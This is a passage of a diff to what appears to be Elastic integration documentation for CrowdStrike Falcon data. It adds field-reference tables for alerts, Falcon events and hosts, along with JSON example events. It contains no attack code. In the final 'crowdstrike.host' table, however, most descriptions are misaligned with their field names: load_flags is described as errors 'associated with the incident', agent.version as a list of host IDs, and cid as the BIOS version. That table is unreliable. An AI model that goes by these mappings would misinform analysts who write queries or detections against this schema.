keyword | +| crowdstrike.alert.device.bios_version | Version of the BIOS. | keyword | +| crowdstrike.alert.device.cid | CrowdStrike identifier associated with the device. | keyword | +| crowdstrike.alert.device.config_id_base | Base configuration identifier. | keyword | +| crowdstrike.alert.device.config_id_build | Build configuration identifier. | keyword | +| crowdstrike.alert.device.config_id_platform | Platform configuration identifier. | long | +| crowdstrike.alert.device.external_ip | External IP address of the device. | ip | +| crowdstrike.alert.device.first_seen | Timestamp indicating when the device was first seen. | date | +| crowdstrike.alert.device.groups | Groups associated with the device. | keyword | +| crowdstrike.alert.device.hostinfo.active_directory_dn_display | Display name for Active Directory. | keyword | +| crowdstrike.alert.device.hostinfo.domain | Domain of the device. | keyword | +| crowdstrike.alert.device.hostname | Hostname of the device. | keyword | +| crowdstrike.alert.device.id | Unique identifier for the device. | keyword | +| crowdstrike.alert.device.last_seen | Timestamp indicating when the device was last seen. | date | +| crowdstrike.alert.device.local_ip | Local IP address of the device. | ip | +| crowdstrike.alert.device.mac_address | MAC address of the device. | keyword | +| crowdstrike.alert.device.machine_domain | Domain of the machine. | keyword | +| crowdstrike.alert.device.major_version | Major version of the device. | keyword | +| crowdstrike.alert.device.minor_version | Minor version of the device. | keyword | +| crowdstrike.alert.device.modified_timestamp | Timestamp indicating when the device was last modified. | date | +| crowdstrike.alert.device.os_version | Operating system version. | keyword | +| crowdstrike.alert.device.ou | Organizational unit information. | keyword | +| crowdstrike.alert.device.platform_id | Platform identifier. | keyword | +| crowdstrike.alert.device.platform_name | Name of the platform. | keyword | +| crowdstrike.alert.device.pod_labels | Labels associated with the device. | keyword | +| crowdstrike.alert.device.product_type | Type of product associated with the device. | keyword | +| crowdstrike.alert.device.product_type_desc | Description of the product type. | keyword | +| crowdstrike.alert.device.site_name | Name of the site associated with the device. | keyword | +| crowdstrike.alert.device.status | Status of the device. | keyword | +| crowdstrike.alert.device.system_manufacturer | System manufacturer of the device. | keyword | +| crowdstrike.alert.device.system_product_name | System product name. | keyword | +| crowdstrike.alert.falcon_host_link | Link to CrowdStrike Falcon host activity. | keyword | +| crowdstrike.alert.filename | Name of the detected file. | keyword | +| crowdstrike.alert.filepath | Path to the detected file. | keyword | +| crowdstrike.alert.grandparent_details.cmdline | Command line of the grandparent process. | keyword | +| crowdstrike.alert.grandparent_details.filename | Filename of the grandparent process. | keyword | +| crowdstrike.alert.grandparent_details.filepath | Filepath of the grandparent process. | keyword | +| crowdstrike.alert.grandparent_details.local_process_id | Local process ID of the grandparent process. | keyword | +| crowdstrike.alert.grandparent_details.md5 | grandparent_details.md5 MD5 hash of the grandparent process. | keyword | +| crowdstrike.alert.grandparent_details.process_graph_id | Graph ID of the grandparent process. | keyword | +| crowdstrike.alert.grandparent_details.process_id | Process ID of the grandparent process. | keyword | +| crowdstrike.alert.grandparent_details.sha256 | grandparent_details.sha256 SHA256 hash of the grandparent process. | keyword | +| crowdstrike.alert.grandparent_details.timestamp | Timestamp of the grandparent process. | date | +| crowdstrike.alert.grandparent_details.user_graph_id | Graph ID of the grandparent process user. | keyword | +| crowdstrike.alert.grandparent_details.user_id | User ID of the grandparent process. | keyword | +| crowdstrike.alert.grandparent_details.user_name | Username of the grandparent process. | keyword | +| crowdstrike.alert.has_script_or_module_ioc | Indicates if there is a script or module IOC (Indicator of Compromise). | boolean | +| crowdstrike.alert.id | Identifier associated with the alert. | keyword | +| crowdstrike.alert.indicator_id | Identifier of the detected indicator. | keyword | +| crowdstrike.alert.ioc_context.cmdline | Command Line of the IOC context. | keyword | +| crowdstrike.alert.ioc_context.ioc_description | Description of the IOC context. | keyword | +| crowdstrike.alert.ioc_context.ioc_source | Source of the IOC. | keyword | +| crowdstrike.alert.ioc_context.ioc_type | Type of IOC. | keyword | +| crowdstrike.alert.ioc_context.ioc_value | Value of the IOC. | keyword | +| crowdstrike.alert.ioc_context.md5 | ioc_context.md5 MD5 hash associated with the IOC. | keyword | +| crowdstrike.alert.ioc_context.sha256 | ioc_context.sha256 SHA256 hash associated with the IOC. | keyword | +| crowdstrike.alert.ioc_context.type | Type of IOC context. | keyword | +| crowdstrike.alert.ioc_values | Values associated with the IOC. | keyword | +| crowdstrike.alert.is_synthetic_quarantine_disposition | Indicates if the quarantine disposition is synthetic. | boolean | +| crowdstrike.alert.local_process_id | Local process ID associated with the alert. | keyword | +| crowdstrike.alert.logon_domain | Domain associated with the logon. | keyword | +| crowdstrike.alert.md5 | md5 MD5 hash associated with the detected file. | keyword | +| crowdstrike.alert.name | Name of the detection. | keyword | +| crowdstrike.alert.objective | Objective of the detection. | keyword | +| crowdstrike.alert.parent_details.cmdline | Command line of the parent process. | keyword | +| crowdstrike.alert.parent_details.filename | Filename of the parent process. | keyword | +| crowdstrike.alert.parent_details.filepath | Filepath of the parent process. | keyword | +| crowdstrike.alert.parent_details.local_process_id | Local process ID of the parent process. | keyword | +| crowdstrike.alert.parent_details.md5 | parent_details.md5 MD5 hash of the parent process. | keyword | +| crowdstrike.alert.parent_details.process_graph_id | Graph ID of the parent process. | keyword | +| crowdstrike.alert.parent_details.process_id | Process ID of the parent process. | keyword | +| crowdstrike.alert.parent_details.sha256 | parent_details.sha256 SHA256 hash of the parent process. | keyword | +| crowdstrike.alert.parent_details.timestamp | Timestamp of the parent process. | date | +| crowdstrike.alert.parent_details.user_graph_id | Graph ID of the parent process user. | keyword | +| crowdstrike.alert.parent_details.user_id | User ID of the parent process. | keyword | +| crowdstrike.alert.parent_details.user_name | Username of the parent process. | keyword | +| crowdstrike.alert.parent_process_id | Process ID of the parent process. | keyword | +| crowdstrike.alert.pattern_disposition | Disposition of the pattern. | long | +| crowdstrike.alert.pattern_disposition_description | Description of the pattern disposition. | keyword | +| crowdstrike.alert.pattern_disposition_details.blocking_unsupported_or_disabled | Indicates if blocking is unsupported or disabled. | boolean | +| crowdstrike.alert.pattern_disposition_details.bootup_safeguard_enabled | Indicates if the bootup safeguard is enabled. | boolean | +| crowdstrike.alert.pattern_disposition_details.critical_process_disabled | Indicates if the critical process is disabled. | boolean | +| crowdstrike.alert.pattern_disposition_details.detect | Indicates if the pattern detected the threat. | boolean | +| crowdstrike.alert.pattern_disposition_details.fs_operation_blocked | Indicates if file system operation is blocked. | boolean | +| crowdstrike.alert.pattern_disposition_details.handle_operation_downgraded | Indicates if handle operation is downgraded. | boolean | +| crowdstrike.alert.pattern_disposition_details.inddet_mask | Indicates if the indicator detection mask is true. | boolean | +| crowdstrike.alert.pattern_disposition_details.indicator | Indicates if the pattern detected an indicator. | boolean | +| crowdstrike.alert.pattern_disposition_details.kill_action_failed | Indicates if the kill action failed. | boolean | +| crowdstrike.alert.pattern_disposition_details.kill_parent | Indicates if the parent process was killed. | boolean | +| crowdstrike.alert.pattern_disposition_details.kill_process | Indicates if the process was killed. | boolean | +| crowdstrike.alert.pattern_disposition_details.kill_subprocess | Indicates if the subprocess was killed. | boolean | +| crowdstrike.alert.pattern_disposition_details.operation_blocked | Indicates if the operation is blocked. | boolean | +| crowdstrike.alert.pattern_disposition_details.policy_disabled | Indicates if the policy is disabled. | boolean | +| crowdstrike.alert.pattern_disposition_details.process_blocked | Indicates if the process is blocked. | boolean | +| crowdstrike.alert.pattern_disposition_details.quarantine_file | Indicates if the file is quarantined. | boolean | +| crowdstrike.alert.pattern_disposition_details.quarantine_machine | Indicates if the machine is quarantined. | boolean | +| crowdstrike.alert.pattern_disposition_details.registry_operation_blocked | Indicates if registry operation is blocked. | boolean | +| crowdstrike.alert.pattern_disposition_details.rooting | Indicates if rooting is detected. | boolean | +| crowdstrike.alert.pattern_disposition_details.sensor_only | Indicates if the detection is based on the sensor only. | boolean | +| crowdstrike.alert.pattern_disposition_details.suspend_parent | Indicates if the parent process was suspended. | boolean | +| crowdstrike.alert.pattern_disposition_details.suspend_process | Indicates if the process was suspended. | boolean | +| crowdstrike.alert.pattern_id | Identifier associated with the pattern. | keyword | +| crowdstrike.alert.platform | Platform associated with the alert. | keyword | +| crowdstrike.alert.poly_id | Identifier associated with polymorphic behavior. | keyword | +| crowdstrike.alert.process_end_time | Timestamp indicating when the process ended. | date | +| crowdstrike.alert.process_id | Identifier associated with the process. | keyword | +| crowdstrike.alert.process_start_time | Timestamp indicating when the process started. | date | +| crowdstrike.alert.product | Product associated with the detection. | keyword | +| crowdstrike.alert.quarantined_files.filename | Filename of quarantined files. | keyword | +| crowdstrike.alert.quarantined_files.id | Identifier of quarantined files. | keyword | +| crowdstrike.alert.quarantined_files.sha256 | quarantined_files.sha256 SHA256 hash of quarantined files. | keyword | +| crowdstrike.alert.quarantined_files.state | State of quarantined files. | keyword | +| crowdstrike.alert.scenario | Scenario associated with the detection. | keyword | +| crowdstrike.alert.severity | Severity level associated with the detection. | long | +| crowdstrike.alert.sha1 | sha1 SHA1 hash associated with the detected file. | keyword | +| crowdstrike.alert.sha256 | sha256 SHA256 hash associated with the detected file. | keyword | +| crowdstrike.alert.show_in_ui | Indicates if the alert should be displayed in the user interface. | boolean | +| crowdstrike.alert.source_products | Products associated with the data source. | keyword | +| crowdstrike.alert.source_vendors | Vendors associated with the data source. | keyword | +| crowdstrike.alert.status | Status of the alert. | keyword | +| crowdstrike.alert.tactic | Tactic associated with the detection. | keyword | +| crowdstrike.alert.tactic_id | Identifier associated with the tactic. | keyword | +| crowdstrike.alert.technique | Technique associated with the detection. | keyword | +| crowdstrike.alert.technique_id | Identifier associated with the technique. | keyword | +| crowdstrike.alert.timestamp | Timestamp associated with the alert. | date | +| crowdstrike.alert.tree_id | Identifier associated with the tree. | keyword | +| crowdstrike.alert.tree_root | Root identifier associated with the tree. | keyword | +| crowdstrike.alert.triggering_process_graph_id | Graph ID of the triggering process. | keyword | +| crowdstrike.alert.type | Type associated with the alert. | keyword | +| crowdstrike.alert.updated_timestamp | Timestamp indicating when the alert was last updated. | date | +| crowdstrike.alert.user_id | User ID associated with the alert. | keyword | +| crowdstrike.alert.user_name | Username associated with the alert. | keyword | +| data_stream.dataset | Data stream dataset. | constant_keyword | +| data_stream.namespace | Data stream namespace. | constant_keyword | +| data_stream.type | Data stream type. | constant_keyword | +| event.dataset | Event dataset. | constant_keyword | +| event.module | Event module. | constant_keyword | +| input.type | Type of filebeat input. | keyword | +| log.offset | Log offset. | long | +| tags | User defined tags. | keyword | + + ### Falcon Contains endpoint data and CrowdStrike Falcon platform audit data forwarded from Falcon SIEM Connector. @@ -37,6 +577,7 @@ Current supported event types are: - Mobile Detection events - Recon Notification events - XDR Detection events +- Scheduled Report Notification events **Exported fields** @@ -61,6 +602,7 @@ Current supported event types are: | container.labels | Image labels. | object | | container.name | Container name. | keyword | | crowdstrike.event.AccountCreationTimeStamp | The timestamp of when the source account was created in Active Directory. | date | +| crowdstrike.event.AccountId | | keyword | | crowdstrike.event.ActivityId | ID of the activity that triggered the detection. | keyword | | crowdstrike.event.AddedPrivilege | The difference between their current and previous list of privileges. | keyword | | crowdstrike.event.AdditionalAccountObjectGuid | Additional involved user object GUID. | keyword | @@ -72,6 +614,7 @@ Current supported event types are: | crowdstrike.event.AdditionalEndpointSensorId | Additional involved endpoint agent ID. | keyword | | crowdstrike.event.AdditionalLocationCountryCode | Additional involved country code. | keyword | | crowdstrike.event.AdditionalSsoApplicationIdentifier | Additional application identifier. | keyword | +| crowdstrike.event.AgentIdString | | keyword | | crowdstrike.event.AnomalousTicketContentClassification | Ticket signature analysis. | keyword | | crowdstrike.event.AssociatedFile | The file associated with the triggering indicator. | keyword | | crowdstrike.event.Attributes | JSON objects containing additional information about the event. | flattened | @@ -80,6 +623,9 @@ Current supported event types are: | crowdstrike.event.CertificateTemplateIdentifier | The ID of the certificate template. | keyword | | crowdstrike.event.CertificateTemplateName | Name of the certificate template. | keyword | | crowdstrike.event.Certificates | Provides one or more JSON objects which includes related SSL/TLS Certificates. | nested | +| crowdstrike.event.CloudPlatform | | keyword | +| crowdstrike.event.CloudProvider | | keyword | +| crowdstrike.event.CloudService | | keyword | | crowdstrike.event.Commands | Commands run in a remote session. | keyword | | crowdstrike.event.ComputerName | Name of the computer where the detection occurred. | keyword | | crowdstrike.event.CustomerId | Customer identifier. | keyword | @@ -93,6 +639,14 @@ Current supported event types are: | crowdstrike.event.EnvironmentVariables | Provides one or more JSON objects which includes related environment variables. | nested | | crowdstrike.event.EventType | CrowdStrike provided event type. | keyword | | crowdstrike.event.ExecutablesWritten | Detected executables written to disk by a process. | nested | +| crowdstrike.event.ExecutionID | | keyword | +| crowdstrike.event.ExecutionMetadata.ExecutionDuration | | long | +| crowdstrike.event.ExecutionMetadata.ExecutionStart | | date | +| crowdstrike.event.ExecutionMetadata.ReportFileName | | keyword | +| crowdstrike.event.ExecutionMetadata.ResultCount | | long | +| crowdstrike.event.ExecutionMetadata.ResultID | | keyword | +| crowdstrike.event.ExecutionMetadata.SearchWindowEnd | | date | +| crowdstrike.event.ExecutionMetadata.SearchWindowStart | | date | | crowdstrike.event.Finding | The details of the finding. | keyword | | crowdstrike.event.FineScore | The highest incident score reached as of the time the event was sent. | float | | crowdstrike.event.Flags.Audit | CrowdStrike audit flag. | boolean | @@ -172,6 +726,11 @@ Current supported event types are: | crowdstrike.event.PreviousPrivileges | A list of the source account's privileges before privilege changes were made. | keyword | | crowdstrike.event.Protocol | CrowdStrike provided protocol. | keyword | | crowdstrike.event.ProtocolAnomalyClassification | Authentication signature analysis. | keyword | +| crowdstrike.event.Region | | keyword | +| crowdstrike.event.ReportFileReference | | keyword | +| crowdstrike.event.ReportID | | keyword | +| crowdstrike.event.ReportName | | keyword | +| crowdstrike.event.ReportType | | keyword | | crowdstrike.event.ResourceAttributes | A JSON blob with all resource attributes. | flattened | | crowdstrike.event.ResourceId | The cloud resource identifier. | keyword | | crowdstrike.event.ResourceIdType | The type of the detected resource identifier. | keyword | @@ -209,6 +768,7 @@ Current supported event types are: | crowdstrike.event.SsoApplicationIdentifier | Destination application identifier. | keyword | | crowdstrike.event.State | Identity-based detection or incident status. | keyword | | crowdstrike.event.Status | CrowdStrike status. | keyword | +| crowdstrike.event.StatusMessage | | keyword | | crowdstrike.event.Success | Indicator of whether or not this event was successful. | boolean | | crowdstrike.event.SuspiciousMachineAccountAlterationType | Machine alteration type. | keyword | | crowdstrike.event.SystemProperties | Provides one or more JSON objects which includes related system properties. | nested | @@ -226,6 +786,7 @@ Current supported event types are: | crowdstrike.event.Trampolines | Provides one or more JSON objects describing the relevant functions and processes performing inline API hooks. | nested | | crowdstrike.event.TreeID | CrowdStrike tree id. | keyword | | crowdstrike.event.UserId | Email address or user ID associated with the event. | keyword | +| crowdstrike.event.UserUUID | | keyword | | crowdstrike.event.VerifiedBootState | Provides the device’s current boot state. | keyword | | crowdstrike.event.XdrType | Type of detection: xdr or xdr-scheduled-search. | keyword | | crowdstrike.metadata.customerIDString | Customer identifier | keyword | @@ -355,11 +916,11 @@ An example event for `falcon` looks as following: { "@timestamp": "2020-02-12T21:29:10.000Z", "agent": { - "ephemeral_id": "6b7924ba-f695-422a-a296-d1092ff909e4", - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "ephemeral_id": "fe495f50-2dbf-43ee-9c49-b35ef8bf9235", + "id": "df7cb44a-7978-449c-992e-c6b22e788ae9", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.11.0" }, "crowdstrike": { "event": { @@ -404,9 +965,9 @@ An example event for `falcon` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "f25d13cd-18cc-4e73-822c-c4f849322623", + "id": "df7cb44a-7978-449c-992e-c6b22e788ae9", "snapshot": false, - "version": "8.10.1" + "version": "8.11.0" }, "event": { "action": [ @@ -418,7 +979,7 @@ An example event for `falcon` looks as following: ], "created": "2020-02-12T21:29:10.710Z", "dataset": "crowdstrike.falcon", - "ingested": "2023-09-26T13:19:10Z", + "ingested": "2024-01-29T08:59:16Z", "kind": "event", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 0,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581542950710,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"api-client-id:1234567890abcdefghijklmnopqrstuvwxyz\",\n \"UserIp\": \"10.10.0.8\",\n \"OperationName\": \"streamStarted\",\n \"ServiceName\": \"Crowdstrike Streaming API\",\n \"Success\": true,\n \"UTCTimestamp\": 1581542950,\n \"AuditKeyValues\": [\n {\n \"Key\": \"APIClientID\",\n \"ValueString\": \"1234567890abcdefghijklmnopqr\"\n },\n {\n \"Key\": \"partition\",\n \"ValueString\": \"0\"\n },\n {\n \"Key\": \"offset\",\n \"ValueString\": \"-1\"\n },\n {\n \"Key\": \"appId\",\n \"ValueString\": \"siem-connector-v2.0.0\"\n },\n {\n \"Key\": \"eventType\",\n \"ValueString\": \"[UserActivityAuditEvent HashSpreadingEvent RemoteResponseSessionStartEvent RemoteResponseSessionEndEvent DetectionSummaryEvent AuthActivityAuditEvent]\"\n }\n ]\n }\n}", "outcome": "success" @@ -1009,6 +1570,7 @@ and/or `session_token`. | event.type | This is one of four ECS Categorization Fields, and indicates the third level in the ECS category hierarchy. `event.type` represents a categorization "sub-bucket" that, when used along with the `event.category` field values, enables filtering events down to a level appropriate for single visualization. This field is an array. This will allow proper categorization of some events that fall in multiple event types. | keyword | | file.device | Device that is the source of the file. | keyword | | file.directory | Directory where the file is located. It should include the drive letter, when appropriate. | keyword | +| file.drive_letter | Drive letter where the file is located. This field is only relevant on Windows. The value should be uppercase, and not include the colon. | keyword | | file.extension | File extension, excluding the leading dot. Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). | keyword | | file.hash.sha256 | SHA256 hash. | keyword | | file.inode | Inode representing the file in the filesystem. | keyword | @@ -1017,11 +1579,13 @@ and/or `session_token`. | file.path.text | Multi-field of `file.path`. | match_only_text | | file.size | File size in bytes. Only relevant when `file.type` is "file". | long | | file.type | File type (file, dir, or symlink). | keyword | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | | host.geo.city_name | City name. | keyword | | host.geo.continent_name | Name of the continent. | keyword | | host.geo.country_name | Country name. | keyword | | host.geo.timezone | The time zone of the location, such as IANA time zone name. | keyword | | host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.ip | Host ip addresses. | ip | | host.name | Name of the host. It can contain what hostname returns on Unix systems, the fully qualified domain name (FQDN), or a name specified by the user. The recommended value is the lowercase FQDN of the host. | keyword | | host.os.type | Use the `os.type` field to categorize the operating system into one of the broad commercial families. If the OS you're dealing with is not listed as an expected value, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. | keyword | | host.os.version | Operating system version as a raw string. | keyword | @@ -1320,3 +1884,343 @@ An example event for `fdr` looks as following: } } ``` + +### Host + +This is the `Host` dataset. + +#### Example + +An example event for `host` looks as following: + +```json +{ + "@timestamp": "2023-11-07T10:26:53.000Z", + "agent": { + "ephemeral_id": "5805cb9f-4413-4da3-8da7-b85cd99c2961", + "id": "b095b147-68c9-47a8-a1fc-7fd9dc3764c5", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.11.0" + }, + "crowdstrike": { + "host": { + "agent": { + "load_flags": "0", + "local_time": "2023-11-07T04:51:16.678Z", + "version": "7.05.17603.0" + }, + "bios": { + "manufacturer": "ABCInc.", + "version": "2020.0.1.0.0(iBridge:22.11.000.0.0,0)" + }, + "chassis_type": { + "desc": "Laptop", + "value": "9" + }, + "cid": "92012896127c4948236ba7601b886b0", + "config_id": { + "base": "6594763", + "build": "1703", + "platform": "4" + }, + "connection_ip": "81.2.69.192", + "cpu_signature": "460517", + "device_policies": { + "device_control": { + "applied": true, + "applied_date": "2023-06-20T08:45:26.341Z", + "assigned_date": "2023-06-20T08:43:47.736Z", + "policy_id": "2f88daf0177f467dae69262a5ce71775", + "policy_type": "device-control" + }, + "firewall": { + "applied": true, + "applied_date": "2023-09-11T10:33:44.174Z", + "assigned_date": "2023-09-11T10:32:47.853Z", + "policy": { + "id": "1ee301f7e3e24e96ad6a23c73aaac1e3", + "type": "firewall" + }, + "rule_set_id": "1ee301f7e3e24e96ad6a23c73aaac1e3" + }, + "global_config": { + "applied": true, + "applied_date": "2023-11-07T04:52:59.515Z", + "assigned_date": "2023-11-07T04:51:18.946Z", + "policy": { + "id": "7e3078b60976486cac5dc998808d9135", + "type": "globalconfig" + }, + "settings_hash": "f01def74" + }, + "prevention": { + "applied": true, + "applied_date": "2023-06-08T10:04:47.643Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "1024fac1b279424fa7300b8ac2d56be5", + "type": "prevention" + }, + "settings_hash": "f7a54ca1" + }, + "remote_response": { + "applied": true, + "applied_date": "2023-06-08T10:04:47.017Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "dabb4def99034f11b9b3d52271584c9f", + "type": "remote-response" + }, + "settings_hash": "8a548e5e" + }, + "sensor_update": { + "applied": true, + "applied_date": "2023-11-07T04:52:59.659Z", + "assigned_date": "2023-11-07T04:47:43.342Z", + "policy": { + "id": "64bfa2bbcd4e46da92a66b107933da11", + "type": "sensor-update" + }, + "settings_hash": "tagged|18;101", + "uninstall_protection": "ENABLED" + } + }, + "external_ip": "81.2.69.192", + "first_seen": "2023-06-08T10:00:19.000Z", + "group_hash": "b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77", + "groups": [ + "182388a8dbea4c44b5e019cfd32c2695" + ], + "hostname": "CLM101-131.local", + "id": "3114433dbce478ca48d9a828b9b34be", + "kernel_version": "22.6.0", + "last_seen": "2023-11-07T10:25:24.000Z", + "local_ip": "81.2.69.142", + "mac_address": "14-7D-DA-AD-AC-71", + "machine_domain": "SYS", + "major_version": "22", + "meta": { + "version": "6002", + "version_string": "7:43570272778" + }, + "minor_version": "6", + "modified_timestamp": "2023-11-07T10:26:53.000Z", + "os": { + "build": "22G120", + "version": "Ventura(13)" + }, + "platform": { + "id": "1", + "name": "Mac" + }, + "policies": [ + { + "applied": true, + "applied_date": "2023-06-08T10:04:47.643Z", + "assigned_date": "2023-06-08T10:03:49.505Z", + "policy": { + "id": "1024fac1b279424fa7300b8ac2d56be5", + "type": "prevention" + }, + "settings_hash": "f7a54ca1" + } + ], + "product_type_desc": "Workstation", + "provision_status": "Provisioned", + "reduced_functionality_mode": "no", + "serial_number": "FVFDH73HMNHX", + "site_name": "Default-First-Site-Name", + "status": "normal", + "system": { + "manufacturer": "ABCInc.", + "product_name": "Air,1" + }, + "tags": [ + "tags" + ] + } + }, + "data_stream": { + "dataset": "crowdstrike.host", + "namespace": "ep", + "type": "logs" + }, + "device": { + "id": "3114433dbce478ca48d9a828b9b34be" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "b095b147-68c9-47a8-a1fc-7fd9dc3764c5", + "snapshot": false, + "version": "8.11.0" + }, + "event": { + "agent_id_status": "verified", + "category": [ + "host" + ], + "dataset": "crowdstrike.host", + "ingested": "2024-01-22T13:24:41Z", + "kind": "event", + "original": "{\"agent_load_flags\":\"0\",\"agent_local_time\":\"2023-11-07T04:51:16.678Z\",\"agent_version\":\"7.05.17603.0\",\"bios_manufacturer\":\"ABCInc.\",\"bios_version\":\"2020.0.1.0.0(iBridge:22.11.000.0.0,0)\",\"chassis_type\":\"9\",\"chassis_type_desc\":\"Laptop\",\"cid\":\"92012896127c4948236ba7601b886b0\",\"config_id_base\":\"6594763\",\"config_id_build\":\"1703\",\"config_id_platform\":\"4\",\"connection_ip\":\"81.2.69.192\",\"cpu_signature\":\"460517\",\"device_id\":\"3114433dbce478ca48d9a828b9b34be\",\"device_policies\":{\"device_control\":{\"applied\":true,\"applied_date\":\"2023-06-20T08:45:26.341093915Z\",\"assigned_date\":\"2023-06-20T08:43:47.736146738Z\",\"policy_id\":\"2f88daf0177f467dae69262a5ce71775\",\"policy_type\":\"device-control\"},\"firewall\":{\"applied\":true,\"applied_date\":\"2023-09-11T10:33:44.174488832Z\",\"assigned_date\":\"2023-09-11T10:32:47.853976945Z\",\"policy_id\":\"1ee301f7e3e24e96ad6a23c73aaac1e3\",\"policy_type\":\"firewall\",\"rule_set_id\":\"1ee301f7e3e24e96ad6a23c73aaac1e3\"},\"global_config\":{\"applied\":true,\"applied_date\":\"2023-11-07T04:52:59.515775409Z\",\"assigned_date\":\"2023-11-07T04:51:18.94671252Z\",\"policy_id\":\"7e3078b60976486cac5dc998808d9135\",\"policy_type\":\"globalconfig\",\"settings_hash\":\"f01def74\"},\"prevention\":{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.643357971Z\",\"assigned_date\":\"2023-06-08T10:03:49.505180252Z\",\"policy_id\":\"1024fac1b279424fa7300b8ac2d56be5\",\"policy_type\":\"prevention\",\"rule_groups\":[],\"settings_hash\":\"f7a54ca1\"},\"remote_response\":{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.01735027Z\",\"assigned_date\":\"2023-06-08T10:03:49.505163572Z\",\"policy_id\":\"dabb4def99034f11b9b3d52271584c9f\",\"policy_type\":\"remote-response\",\"settings_hash\":\"8a548e5e\"},\"sensor_update\":{\"applied\":true,\"applied_date\":\"2023-11-07T04:52:59.659583066Z\",\"assigned_date\":\"2023-11-07T04:47:43.342175341Z\",\"policy_id\":\"64bfa2bbcd4e46da92a66b107933da11\",\"policy_type\":\"sensor-update\",\"settings_hash\":\"tagged|18;101\",\"uninstall_protection\":\"ENABLED\"}},\"external_ip\":\"81.2.69.192\",\"first_seen\":\"2023-06-08T10:00:19Z\",\"group_hash\":\"b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77\",\"groups\":[\"182388a8dbea4c44b5e019cfd32c2695\"],\"hostname\":\"CLM101-131.local\",\"kernel_version\":\"22.6.0\",\"last_seen\":\"2023-11-07T10:25:24Z\",\"local_ip\":\"81.2.69.142\",\"mac_address\":\"14-7d-da-ad-ac-71\",\"machine_domain\":\"SYS\",\"major_version\":\"22\",\"meta\":{\"version\":\"6002\",\"version_string\":\"7:43570272778\"},\"minor_version\":\"6\",\"modified_timestamp\":\"2023-11-07T10:26:53Z\",\"os_build\":\"22G120\",\"os_version\":\"Ventura(13)\",\"platform_id\":\"1\",\"platform_name\":\"Mac\",\"policies\":[{\"applied\":true,\"applied_date\":\"2023-06-08T10:04:47.643357971Z\",\"assigned_date\":\"2023-06-08T10:03:49.505180252Z\",\"policy_id\":\"1024fac1b279424fa7300b8ac2d56be5\",\"policy_type\":\"prevention\",\"rule_groups\":[],\"settings_hash\":\"f7a54ca1\"}],\"product_type_desc\":\"Workstation\",\"provision_status\":\"Provisioned\",\"reduced_functionality_mode\":\"no\",\"serial_number\":\"FVFDH73HMNHX\",\"site_name\":\"Default-First-Site-Name\",\"status\":\"normal\",\"system_manufacturer\":\"ABCInc.\",\"system_product_name\":\"Air,1\",\"tags\":[\"tags\"]}", + "type": [ + "info" + ] + }, + "host": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "hostname": "CLM101-131.local", + "ip": [ + "81.2.69.192" + ], + "mac": [ + "14-7D-DA-AD-AC-71" + ], + "os": { + "full": "Ventura(13)", + "platform": "Mac" + } + }, + "input": { + "type": "cel" + }, + "related": { + "hash": [ + "f01def74", + "f7a54ca1", + "8a548e5e", + "tagged|18;101", + "b607fe25348a46d421ff46e19741b0caf5bbc70bb6da1637f56e97b4e1454d77" + ], + "hosts": [ + "CLM101-131.local", + "SYS" + ], + "ip": [ + "81.2.69.192", + "81.2.69.142" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields", + "forwarded", + "crowdstrike-host" + ] +} +``` + +**Exported fields** + +| Field | Description | Type | +|---|---|---| +| @timestamp | Event timestamp. | date | +| crowdstrike.host.agent.load_flags | Any errors associated with the incident. | keyword | +| crowdstrike.host.agent.local_time | The fine score associated with the incident. | date | +| crowdstrike.host.agent.version | The list of host IDs associated with the incident. | keyword | +| crowdstrike.host.bios.manufacturer | Flags indicating the load status of the agent on the host. | keyword | +| crowdstrike.host.bios.version | The local time on the host where the agent is running. | keyword | +| crowdstrike.host.chassis_type.desc | The version of the agent running on the host. | keyword | +| crowdstrike.host.chassis_type.value | The manufacturer of the BIOS on the host. | keyword | +| crowdstrike.host.cid | The version of the BIOS on the host. | keyword | +| crowdstrike.host.config_id.base | The customer ID associated with the host. | keyword | +| crowdstrike.host.config_id.build | The base configuration ID associated with the host. | keyword | +| crowdstrike.host.config_id.platform | The build configuration ID associated with the host. | keyword | +| crowdstrike.host.connection_ip | The platform configuration ID associated with the host. | ip | +| crowdstrike.host.cpu_signature | The device ID associated with the host. | keyword | +| crowdstrike.host.device_policies.device_control.applied | Timestamp indicating when the host was first seen. | boolean | +| crowdstrike.host.device_policies.device_control.applied_date | The groups associated with the host. | date | +| crowdstrike.host.device_policies.device_control.assigned_date | Timestamp indicating when the host was last seen. | date | +| crowdstrike.host.device_policies.device_control.policy_id | The local IP address of the host. | keyword | +| crowdstrike.host.device_policies.device_control.policy_type | The domain to which the machine belongs. | keyword | +| crowdstrike.host.device_policies.firewall.applied | The major version of the operating system on the host. | boolean | +| crowdstrike.host.device_policies.firewall.applied_date | The minor version of the operating system on the host. | date | +| crowdstrike.host.device_policies.firewall.assigned_date | Timestamp indicating when the host information was last modified. | date | +| crowdstrike.host.device_policies.firewall.policy.id | The organizational units associated with the host. | keyword | +| 